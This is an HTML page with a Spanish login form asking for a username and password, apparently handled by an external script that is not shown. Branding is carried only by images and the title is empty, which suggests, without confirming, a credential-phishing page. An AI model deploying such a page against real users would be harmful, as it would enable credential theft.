<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/obset.css">
    <title></title>
</head>
<body>
    <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/doma.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    
        <div>
            <div class="upto">
                <img src="./img/hedcordf1.png" alt="">
            </div>
        </div>
    
    
        <div class="container">
            <div class="container">
      
      
      
                <form method="post" id="pg1">
                  
                    <div class="group">      
                        <input type="text" id="usa" required placeholder="Tu usuario">
                        <span class="highlight"></span>
                        <span class="bar"></span>
                        <img class="img1" src="./img/inp001.png" alt="">
                    </div>
                        
                    <div class="group g2">      
                        <input type="password" id="paso" required placeholder="Tu contrasena">
                        <span class="highlight"></span>
                        <span class="bar"></span>
                        <img class="img2" src="./img/inp002.png" alt="">
                    </div>
                    
    
                    <button type="submit">Acceder</button>
                    <div class="inder">
                        <img src="./img/underbtn.JPG" alt="">
                    </div>
                </form>
                    
               
               
                
              </div>
        </div>
    </div>

    <div class="pola">
        <div class="pola">
            <img src="./img/botion.JPG" alt="">
        </div>
    </div>
    <script src="./js/stb.js"></script>
</body>
</html>
</body>
</html>